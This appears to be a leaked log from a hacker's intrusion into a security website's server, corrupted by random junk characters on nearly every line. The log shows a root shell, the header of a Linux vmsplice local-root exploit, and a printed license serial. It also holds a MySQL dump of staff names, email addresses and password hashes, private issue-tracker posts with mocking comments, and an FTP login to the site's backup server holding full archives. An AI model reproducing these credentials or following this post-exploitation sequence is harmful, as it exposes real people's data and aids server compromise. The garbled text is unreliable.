( q. D3 R G# l5 x( z& Idrwx—— 2 com com 4096 Jun 4 04:04 backups
& _* g# w. k, J$ q-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql- C; E, F) d' v
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
, X$ |8 l( O* l3 o" w5 k8 w-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
: y2 F' L9 V2 _-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout& P8 K+ _" {- |+ J# `5 k5 Q; E
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile6 _. J9 [' m4 A; ~, a: q0 N" p! X
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
6 g, c2 Z! c8 Xdrwx–x–x 3 com com 4096 Jan 29 2008 domains, V# K, [" R3 S2 l6 F: m5 p
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed3 ?/ }4 r. s2 O9 l; R. Q1 e/ u: w* k
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
, s! q. e" F9 z) g: E% y* d7 y-rw——- 1 com com 69 Nov 18 2008 .lesshst
/ `& c4 B. D. \drwx—— 2 com com 4096 Sep 24 2007 mail; {( a5 P# G7 Z! f4 C ~2 W0 s
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history7 \' R" Y. t1 I8 o
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
) e$ F1 ]- M. Olrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
" d: M. m9 m2 O, j-rw-r—– 1 com mail 34 Sep 24 2007 .shadow9 O, @8 s6 D# a7 ~
drwx—— 2 com com 4096 Aug 26 2008 .ssh* B, C* P% S; x$ Y4 \
-rwx—— 1 com com 8515 Feb 10 2008 t1 M* ?: D1 c1 z
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
$ U' p O+ }/ {- X- _1 S% Hdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp, U3 @+ j/ F- ] ]' c% N
-rw-rw-r– 1 com com 617 May 20 2008 .toprc. R* j+ r8 F$ y) ]& G* ^
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql! r6 L) @: |1 H
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo- D, d; |0 c0 o9 g
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc# |8 x" O5 @! `- o
3 u. G, L5 Q4 |! }% i0 S5 A D0 R( C
sh-3.2# head t.c3 [% W3 Z& K( }: H2 n6 U
/*
+ S. N9 l$ U8 {* jessica_biel_naked_in_my_bed.c5 _! X# o# `+ w& X$ E
** W5 ?) z# e5 g6 y# V
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
9 R" E$ [* B) h4 C* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.6 {9 b# C7 t( S& T; l6 X( ~
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
. u, @ m: o, V1 w- Y5 [' S& x*' j2 F! n" E+ V1 r
* Linux vmsplice Local Root Exploit
4 ^5 D9 q8 k- Z r1 r4 l2 Q$ K, m* By qaaz
$ N v3 J1 w8 C4 L) m# i8 c& T% X*' L) A: m* O3 ?: s+ y
& S/ j" E" v) X& j* Wsh-3.2# cd /& P, c0 u$ [5 }
sh-3.2# ls -la u7 u& H9 Z* Z5 {
total 360
& b0 v+ h! I2 u" L% Q! s! Cdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .: _: f K! k* _2 l
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
5 w, ?/ q% P7 {& a/ [/ M+ c-rw——- 1 root root 10240 Jun 3 02:39 aquota.group3 u% d, ?( l% b, q8 u q: \
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user# D: \7 Y4 @4 | @4 w
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
2 @ d" g/ d- d- T& X! ?) p-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck5 f5 l, F$ {! u5 L) B3 [% v
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
1 S P+ x5 k! ~2 \: \drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
% a. j9 b7 f+ w7 A3 Bdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
3 h; J4 d: s4 vdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
, h- L& h& \& o, w6 h" f' \8 [drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev% ?) n1 B$ T( t, {" \
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
: V; {- k7 r2 ?drwxr-xr-x 14 root root 4096 Mar 11 17:56 home/ C- i2 b* {& f9 u9 c
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf( x1 j" E4 H% K0 G; e2 l
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib" O$ u4 q1 T- g5 K1 z: ~' i
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
5 S7 s' o. t( k: ~" s; e& edrwx—— 2 root root 16384 Sep 11 2007 lost+found* I( [$ e7 [' y1 {" ^
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
, I; P* ?1 B4 o) R) A" F6 Qdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc9 ^% c/ O9 V, }" _& K. g; I$ c
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
0 i3 p& ~3 l' K* W0 W9 }9 S2 x-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg+ F4 V0 ]6 l, j; L/ `( H
drwxr-xr-x 2 root root 0 Jun 3 02:43 net/ x) w2 Y- a5 z% n% y0 Z2 t! `; l
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt+ j" ]9 b: D6 G' g L8 A
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc$ f) p8 n0 X4 @3 j, M0 ]( c$ Y
drwxr-x— 15 root root 4096 Jun 4 08:40 root7 U' ^) h# ^8 R- g+ o
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin" i; Q% b+ ^2 H4 n" f3 r" f$ ]5 O) F
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux% h/ E/ \! _& A- ?$ e
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv$ P' \6 {8 C- B0 W% x1 q
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys2 [4 G0 R$ u. N, w
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
' i5 f/ u2 o: g8 h- {' ddrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
7 V# h* n R3 h+ k6 odrwxr-xr-x 26 root root 4096 Jun 4 03:16 var9 t4 Y, ^5 T I/ c) w
" H* X. D$ D: ksh-3.2# cd opt
, F5 d9 _ k+ S% p) U& a2 msh-3.2# ls -la
3 k5 j: ^) W' y, o. ?total 20
" z- w' j& s9 G# e# Y8 y! k% Edrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
; C7 a# U1 Q" z/ }$ ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
& E0 q' z0 L8 p1 ^1 A8 ?drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws5 s" q4 j7 a" w& K" z P/ {
6 J, Y6 V& K6 d; [$ Jsh-3.2# cd lsws/ k+ i8 f7 p! x' ~/ x. @- [
sh-3.2# ls -la9 y4 y- K1 {. u8 ^( W( E3 `
total 108
# L+ T; l& n2 ]& a( ]+ Kdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
# S+ K0 B% z0 `4 n/ J' Fdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..; K' j' B+ j9 P! x
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons% w% |! T/ C' ?6 _ k7 s T; w$ v
drwxr-xr-x 13 root root 4096 May 29 15:10 admin% H8 K" T" g0 t7 P' o: W
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
3 D# D2 p: k1 j @- ?drwxr-xr-x 2 root root 4096 May 29 15:10 bin
% _3 Y% w* |! a: n" e. E) \# Cdrwx—— 4 apache apache 4096 Jun 3 02:43 conf' C# c2 W* Q( W: f
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
9 Q _# {' j$ F% g5 Y5 tdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs( P/ x+ ]* q4 @2 m# m
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
2 X3 ]- M3 p6 fdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib. q3 ]' T7 {& b- N! p& u
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE+ ]3 |2 G: g; ?9 K# _0 @! D
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP. A+ s2 x% h( I" L: N. i
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
( [, I' x& E a) ^-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP1 a) ?3 i5 m( t4 I- C2 w
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
$ N: x6 U* f2 J, R6 h: W. ] ddrwxr-xr-x 2 root root 4096 Mar 20 2008 php
2 t6 S8 S5 Y) {drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
( G4 D6 b& ^2 G$ M7 bdrwxr-xr-x 3 root root 4096 Mar 20 2008 share
3 z6 H- C! f/ \: O-rw-r–r– 1 root root 6 May 29 15:10 VERSION
8 V) n; ~! X1 C. D$ m3 x: e+ f+ m$ i! N0 S. R Y4 S
sh-3.2# cd conf
# U2 S. a' J6 z0 [3 K, Wsh-3.2# ls -la& x( L; }6 _* `& _# K
total 48
! L: A! p9 Q3 q2 t2 d* mdrwx—— 4 apache apache 4096 Jun 3 02:43 .
8 n9 ` U7 T# `+ Ddrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
) H" O. D* Y4 C& J6 l# a5 b% h" Bdrwx—— 2 apache apache 4096 Mar 20 2008 cert
% D6 w- X) B( D: J' O-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
2 [9 V$ i t- G' _$ r-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
' t- j& ]' D' H" t; M- \-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
+ { J, g; r) f* v. b-rw——- 1 apache apache 256 May 29 15:10 license.key
/ ?( ~7 w* h/ M8 `0 z-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
8 H- |/ g5 F; p: _1 A& t$ J' Q-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties* f! t7 Z, ^; ?- F1 S/ C q# A Z2 C
-rw——- 1 apache apache 20 May 29 15:10 serial.no
/ C0 p0 u. x( Tdrwx—— 2 apache apache 4096 Mar 20 2008 templates* s' m+ X/ X) D
. e$ B: ?# [1 P, m3 h, lsh-3.2# cat serial.no
% [/ P+ w7 M+ A" X- q# @IbDl-oVsO-CKqL-wVRa4 P( a0 M4 Q! K, L" x$ m/ J% ~
7 ?( {- v$ G7 `2 Z9 wsh-3.2# mysql
? j4 F5 x5 Q# ~6 VWelcome to the MySQL monitor. Commands end with ; or \g.
9 k; J, [4 K t% CYour MySQL connection id is 286844) M+ l! z( s+ v9 a' t6 k) C$ {1 H
Server version: 5.0.45-community-log MySQL Community Edition (GPL)& C( ?# B4 p: ^1 N9 b8 s6 P7 c# h
8 M% P, l3 g1 |2 f+ I/ D9 |
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
+ K% x5 K0 D7 P; w, `0 H. k; i4 ?7 e
mysql> show databases;6 Z1 j: t2 D! Z" f) `+ P7 T
+———————–+ L1 V- u: I1 ?
| Database |. V6 n' K- ]6 B. v: n
+———————–+# H6 c8 |9 `. d# q' Y# _. V8 l
| information_schema |' Q4 e: F) M, W e! E: @9 l
| astanet_ads |
; l1 m4 a9 p; q| astanet_mailing_lists |# z6 `* ^; V" [2 g! `
| astanet_mediawiki |8 ]4 M3 x. Z2 q& K' L3 r3 c
| astanet_membersystem |4 x, H% q5 e, w) o' q' P9 X
| com_contrexx |/ |3 I) n1 @0 H4 i' |+ U: z Z& Q/ ^
| com_contrexx2 |. r! c4 Q, P: w9 Z4 n# m+ Q9 W1 w
| com_contrexx2_live |+ q* V+ P* }/ O9 u
| da_roundcube |
3 T: m* l& i6 r4 C. D3 z3 M| dolphin |. h: r6 f# l9 a$ }9 w- ^' b
| ideapool |
& Y! v. \ |; K- b% z# ^" c; x4 \| mysql |, {- b- N" V0 s3 S# K: Y
| test |8 O4 g: |, m& `# i: c2 O2 ~
| yourmaster |
5 G! j6 x- n5 z4 S* ]- l+———————–+
; M' @3 r# h" U14 rows in set (0.00 sec)$ C2 O% I! z( h! I; J
% I" I4 }2 D5 x0 p, r
mysql> use ideapool
% q" ~+ t$ ^, TDatabase changed
: r% K# F J: m! q" ?mysql> show tables;8 Y% `! a1 S. E/ U e
+———————————–+
. ^; q! r4 e, ]: d3 K0 B| Tables_in_ideapool |
7 V' T6 T4 H4 @ {6 d4 O# J) C+———————————–+) L6 o! K( u/ U0 R7 B
| eventum_columns_to_display |
% m. @3 b7 \8 E7 b/ K/ V| eventum_custom_field |$ _/ j% |, [- H8 e: C
| eventum_custom_field_option |' `# ?2 f) ^1 E& b
| eventum_custom_filter |$ x6 } m& V9 ~% E$ u9 q0 ]6 V; b
| eventum_customer_account_manager |
4 T# r1 J: N% |" H, P/ ^| eventum_customer_note |6 S4 ]1 V1 G* T% I4 S
| eventum_email_account |
7 j2 j5 R: P- e# c5 H* I| eventum_email_draft |
+ n' Y8 S4 N1 q: ?/ a+ ~| eventum_email_draft_recipient |
$ t4 {5 M2 J) A. a, e6 o) p2 R| eventum_email_response |8 p, [& _5 Q6 W+ W! `# H
| eventum_faq |
0 G( Y5 S6 {4 W9 J| eventum_faq_support_level |
O. M' Z+ g$ i2 {| eventum_group |
( Y6 b+ a- K& r% U: Z9 z| eventum_history_type |& c2 C2 R" U5 n. d; v2 ^2 Z' T# k: K
| eventum_irc_notice |
# v) O$ `- K: _* d| eventum_issue |
% ?" z; i* W) a* k| eventum_issue_association |
. v) v4 T# H* c+ D; X3 H| eventum_issue_attachment |7 y% f: u! i& R3 Q. A
| eventum_issue_attachment_file |% S$ Z7 J* h% {$ b% F
| eventum_issue_checkin |( s) m4 y! @/ d: y9 N
| eventum_issue_custom_field |! N. \( \* ? e* ]
| eventum_issue_history |
. ~. |- \; k! h7 I4 ]5 || eventum_issue_quarantine |& n6 S& u; h: B0 ?5 C3 }) g& M" I
| eventum_issue_requirement |7 k1 }1 _1 h% i9 L! q
| eventum_issue_user |
: b8 m% p9 z# ^( g: c& v4 T| eventum_issue_user_replier |
8 F' F# r/ o) g- z- G| eventum_link_filter |; {! O5 Z* g! V) l
| eventum_mail_queue |
9 i. k6 @% K1 W| eventum_mail_queue_log |5 C' z. G# Q; M1 }
| eventum_news |
$ k# r, _4 }' f4 L% g| eventum_note |
/ Z( E: H* ]( {" [$ E| eventum_phone_support |* r& b" `) |) M
| eventum_project |0 ~- B3 D# D+ f# Z7 |4 I
| eventum_project_category |
# w' X; P& I9 q/ f6 {3 v0 G T| eventum_project_custom_field |
0 q, ~/ Y1 Q# [7 b' u! |1 ]: r| eventum_project_email_response |
# A& f/ |; S2 e7 C! t8 M) i| eventum_project_field_display |
: f1 ]* Q# i9 ?: d3 _- K# n| eventum_project_group |8 C9 w* {5 r# a: C3 X9 C
| eventum_project_link_filter |
, e6 k+ O' f0 K9 h! a9 }| eventum_project_news |( |/ C/ M& H, i6 j) }: u! e
| eventum_project_phone_category |6 f' O! U: S) {& e0 U
| eventum_project_priority |
! ?& Z! k5 ^2 h| eventum_project_release |
4 t4 v7 R( k0 s* j3 N# P| eventum_project_round_robin |
. V/ z z/ T# ^/ C8 z| eventum_project_status |
. r/ J$ d u$ E6 `* o| eventum_project_status_date |
) m6 l! _7 g) n5 F# ?| eventum_project_user |4 y1 V; I; R- B; J; O
| eventum_reminder_action |3 e) V' I6 P% o* Y0 n" Z9 ~7 d3 [
| eventum_reminder_action_list |# B- W1 x/ G, t. [0 a7 M) I
| eventum_reminder_action_type |, T9 }7 ?( j) u* k
| eventum_reminder_field |
- e& P' R/ Q% t$ D# L& I| eventum_reminder_history |
5 n# }- A- q0 G, A| eventum_reminder_level |9 ~ c& o2 x' I2 q. c) ]1 W
| eventum_reminder_level_condition |" H' @$ F/ V- h# A; F2 T$ [) Z
| eventum_reminder_operator |
6 l5 n. {* E; x9 ~7 w, i6 `. T2 J2 V: W| eventum_reminder_priority |8 H+ o0 b2 V; ?
| eventum_reminder_requirement |
& v$ s1 r( Z, J- Y& x$ B| eventum_reminder_triggered_action |
& _& h" y) l0 G+ l9 k; T| eventum_resolution |
" h* R/ t* S( a( B6 ^| eventum_round_robin_user |* F2 a2 ]/ n" x+ I0 M, ^
| eventum_search_profile |
$ c5 g; j6 E' o* e8 C| eventum_status |
# q1 I( J! X) r$ k% G; B| eventum_subscription |$ f- d8 C" }1 V5 p
| eventum_subscription_type |
$ ~# q$ b) A( ]! n" n| eventum_support_email |2 d3 L$ y& K( q* R3 O, k) _
| eventum_support_email_body |
: W# F2 [2 E* m: \| eventum_time_tracking |% u0 U3 [( }9 p% |8 z2 Z. O, R
| eventum_time_tracking_category |
' A$ }3 M+ o" y a6 Z6 I| eventum_user |
y: Z6 Y+ c. K' [' L. ^" t+———————————–+
0 W$ L: r. ]6 Z @7 J" b69 rows in set (0.00 sec): w! X' X& N- u- a
3 I- W; q1 p) r% Vmysql> describe eventum_user;9 z+ |. D, S7 Q
+————————-+——————+——+—–+———————+—————-+
& i$ I7 k2 v4 c- U, G! V# F| Field | Type | Null | Key | Default | Extra |
8 z1 f) q, U! a; p$ D8 v* C1 S+————————-+——————+——+—–+———————+—————-+
q/ j3 @/ _, ]0 |- P# X- Q! z| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
" I t G- O' s+ P+ i k% s| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
) X& P7 d P1 C" j| usr_customer_id | int(11) unsigned | YES | | NULL | |
& F1 a% t) t1 ^- U$ u| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
/ e1 [3 ~. Y6 ` l V| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
2 ^1 X" { `. B O4 N! I| usr_status | varchar(8) | NO | | active | |
/ z, M( J" J8 |+ q) c4 A| usr_password | varchar(32) | NO | | | |9 i( U3 c! Y3 \/ g B
| usr_full_name | varchar(255) | NO | | | |6 r6 W3 r9 T' h
| usr_email | varchar(255) | NO | UNI | | |
" o: t1 ], l; h" b| usr_preferences | longtext | YES | | NULL | |5 L, I$ P: j3 z# a5 Y0 L5 R
| usr_sms_email | varchar(255) | YES | | NULL | |' }2 m, n9 Y) M. e2 m
| usr_clocked_in | tinyint(1) | YES | | 0 | |/ y( G3 g- C- Q' @9 q) F# W8 L
| usr_lang | varchar(5) | YES | | NULL | |; j% h9 H" z! |* _+ h
+————————-+——————+——+—–+———————+—————-+) _! r$ b: ]8 `$ ]; ?/ D
13 rows in set (0.00 sec)4 l9 c0 K3 j' {
3 E+ Y8 k0 x. L b2 |
mysql> select usr_full_name,usr_email,usr_password from eventum_user;, }* ~1 ]- L9 @% ~3 D9 U- a* S
+———————-+——————————-+———————————-+
3 d. m6 M7 B/ L" n9 ?| usr_full_name | usr_email | usr_password |
9 V+ K( p2 i: X8 P; D" X+———————-+——————————-+———————————-+1 S6 X$ s- i# u8 f
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |* O1 x. T1 O. m- R6 g" l/ Q
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |8 Z/ n, \' I% e- Y7 N
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |1 a; m9 m0 l4 W
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
3 d N5 _6 i! q1 _0 U" k) K C| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
5 @/ ?$ N4 d, e( o( l/ K. J0 M9 j| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
# \1 t% `: q) |5 Z& m" |% T. U| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
" _4 f, W. f7 k5 f8 j| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
+ G0 s! ^4 ]9 ^3 g# y9 p; d* s0 l| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |% b+ P, P& }6 U5 y( z8 j ~
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |* b' V' P1 y/ k8 V( ?
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |: L: o7 _ ^3 Y/ ~" L& @7 C/ ]
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |2 O* Z9 n/ i' W9 a; ?
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
) S7 N9 h" a2 u, \. F| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
$ a5 i% x4 j6 @; S| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |6 l9 E1 B1 r* g4 W4 n& D
+———————-+——————————-+———————————-+
/ |# z& C5 o' d# Y15 rows in set (0.00 sec)7 I5 i* q) S2 B; L
5 A8 e y+ V. \$ u' @5 l3 amysql> select iss_description from eventum_issue where iss_id = 43;
2 G {9 ]( F9 m4 K# s( J' ?3 I0 R* A+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% k$ b' D2 d/ T6 R| iss_description
( C9 q! L! {' |. p|
, O* r/ s; N. [8 e+ B- p+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% f* s, K s- ]4 |% o$ Y| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be2 f" T8 ]% ?% ]# q9 }
connected for 90 mins… 120mins… so what i propose is something like:
6 |' Y8 E [; V2 w K2 ^5 q7 d& d链接标记[url]http://www.surfthechannel.com/[/url]7 ?4 w& r* f3 u% r* B) `8 Q/ s* Y2 d
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
: p- _! C8 Y' e8 N+ _( i& Ulike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t9 k3 b4 {+ E- N6 n% Q1 H
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
7 X6 J/ F/ A9 R3 l Uif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
/ V8 t; f2 `4 o: I; j+ ~
7 R8 l+ b: O! q/ @" e; L7 MWe could also put advertisement during play on the flash video player itself… extra $$…
/ B) j& r5 T% @& I
+ U, Y9 W. c5 YBy sykadul |6 s9 d2 J+ u2 _( e2 ~9 d% B1 \
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+% U; h" V: i- ]7 l
1 row in set (0.00 sec) K0 r) B! A( b+ @# g8 I8 V4 K: a
! U3 ]( o# v- v% R// Money and extra $$ is all they care about. remember that.
+ Q7 o, A. [# o" K" C% e( ], `/ G( e) b( {) R8 p& C, P' |' @
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;$ T- z: G" }: M8 b m
+————————+——————————————————————————————————————————————————————————————————————————————-+5 s8 A$ {0 F, C- ^0 x1 G
| iss_summary | iss_description , [& t) E3 o, P6 @) M1 ?9 V: K# K& f
|
: y& E2 g/ e9 k+————————+——————————————————————————————————————————————————————————————————————————————-+
' `: u, K( \! ] k1 }$ [+ R5 _| Forum for REAL EXPERTS | Hello,
8 F" L- B1 v( V2 w8 R3 b; w6 f2 m( [/ c, Q' J" ~0 n% @3 E9 Z
Ishtus and I,( B X3 ]) j k! q1 n" W1 {
1 K8 m6 _: X. I8 I2 s p8 z
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
8 {* p5 ]- c% G9 n S/ x5 _8 CONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
" J3 i7 a, F9 u9 }3 N
7 L$ X- c! L3 s5 _6 OOne example a friend of mine from coresecurity.com!
" V& i: t1 H# o5 P
: V+ L7 R: [8 W9 T" H* G! K' OWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
5 p8 b V$ t; K E: R: j1 S4 n% a5 ^" a7 @
|& F+ o' [$ \- K* A3 x
+————————+——————————————————————————————————————————————————————————————————————————————+
+ P8 e# `1 U5 D( ]1 row in set (0.00 sec)
+ {/ I1 H7 k6 Y! i0 V1 D. ?
9 c' J; c" ~3 }3 d1 P4 a// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…6 j: ^/ Q! R. V. H) o8 |
) H% m, W& h' i$ v
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
* _; D$ t. p6 e+——————+———————————————————————————————+& D: N- o( t( |( a: C" {
| iss_summary | iss_description |
/ J1 L3 @4 F/ U k+——————+———————————————————————————————+
1 q: `4 a7 g9 W. N' h| Website guidance | Virtual Girl which guides you trought the website.9 `/ s. h6 z' q2 k8 V6 M, l
3 j3 O0 P3 J* X. i& SWe need a girl with who you can ( talk )!!!( F6 \6 F8 M5 t5 J9 n
Also for the News!% @4 }0 u, P7 v" _. c( a
So my suggestion is a girl who read you the news loud if you like!
U7 b; Q5 R4 p7 l: {! v d" Dyou can choose between read yourselfe or she read it for you or both!3 G: U* { Z2 W; a5 G5 i
& v6 g( z- `6 C; A0 f' ~2 l, B: {
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!2 O7 k# Z" O. b4 V5 B" o# E N. K
7 Z) G* ]) e6 H; W2 Y. J. }, S' P
Have a look on the example girls!!/ Y8 b; F* K% w+ d
6 u2 j; |. v5 S( ^. p
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
m# d2 i/ _ L
" r& y6 D* Q# B/ t8 K$ R3 Ror that
# ~1 d$ D3 }1 B: ^8 y- h
' e- D. f. _' O B4 H. D链接标记[url]http://www.yellostrom.de/[/url]" F! }/ M4 Q% u1 Q" t! F; t
) v9 w1 ?, }$ [ X" g
|! ^7 [# \( L+ [5 i' U& I8 n
+——————+———————————————————————————————+
0 z$ j8 b2 X5 e. g( i- j. ^9 v1 row in set (0.00 sec)3 O# z; Y# I5 I( |+ ?3 d* Y d. a
( K/ d% M- N( k& o' b. q
// ha ha.' v! q V6 B) @: g W6 K. I
8 Y; ^/ x" p* v0 q' i$ \6 ^8 z
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
1 f& B' e, J- r S6 v8 f+————————–+———————————————————————————————————–+
X4 l6 g6 x/ [- r| iss_summary | iss_description |
; Y# r4 R# O2 C, M+————————–+———————————————————————————————————–+& x) s- B) l3 R& l
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |- w* ^" {, h: m% L! j
+————————–+———————————————————————————————————–+& C, |+ j& o3 g4 V: v
1 row in set (0.00 sec)
9 a! {( A- x8 R+ M8 j: R, f
) \+ [) }6 e4 q% T// LOL.0 @1 R! T& H8 m1 k$ ]# y
9 H( y* i: k' k3 ?6 Zmysql> exit
+ q. t5 e1 ~% B1 KBye+ A/ ]/ I- ^1 L
% Q/ ^: H- ^% x% L. f
sh-3.2# ftp 212.254.194.163, n# B" j, y! q, m5 e
Connected to 212.254.194.163.
0 J" ]! I& @* a; E# K: Q7 \220 BackupCOM_VW FTP server ready.
7 R6 H' V9 ]6 K1 a4 Z& @, \7 x504 AUTH: security mechanism ‘GSSAPI’ not supported.
+ I2 k; m5 g/ A; \. v7 `504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
' {1 d1 K: l( N: Z: C( HKERBEROS_V4 rejected as an authentication type
' ]: |$ R" x; J/ @2 p* I6 n& FName (212.254.194.163:root): astalavista.com
' C+ B; l6 q1 A, K331 Password required for astalavista.com.) t6 B- _- \/ r9 O7 N
Password:& O" }# J. ?* ~0 M, V! ?1 f
230 User astalavista.com logged in.
+ {8 L, [+ F+ g" i" s+ X% h6 d$ j% \Remote system type is UNIX.
; p! ]: V$ Z3 a, d" gUsing binary mode to transfer files.: T" F+ ?4 B9 t" a
ftp> ls -la
) s0 i! C8 M# g c& J227 Entering Passive Mode (212,254,194,163,2,188)
( d# I5 S: H9 c: e150 Opening BINARY mode data connection for ‘file list’.$ C- p: m- m$ V' g
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
0 |, o k# W. k/ V6 d1 m: f; e226 Transfer complete.+ Y, Y" h: x) P8 T9 B
ftp> cd astalavista.com
1 b7 R$ x) G: F6 v ~1 w250 CWD command successful.
% O$ L+ X' K8 ~ J$ k2 Qftp> ls -la
2 H; z' Z. y) h, m2 l& K+ F9 c227 Entering Passive Mode (212,254,194,163,2,189)
' [" k$ @; F2 e: ~150 Opening BINARY mode data connection for ‘file list’.0 Q; d- U% D" d4 x3 A$ i& Q
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
- |. }" B) N. y3 |-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
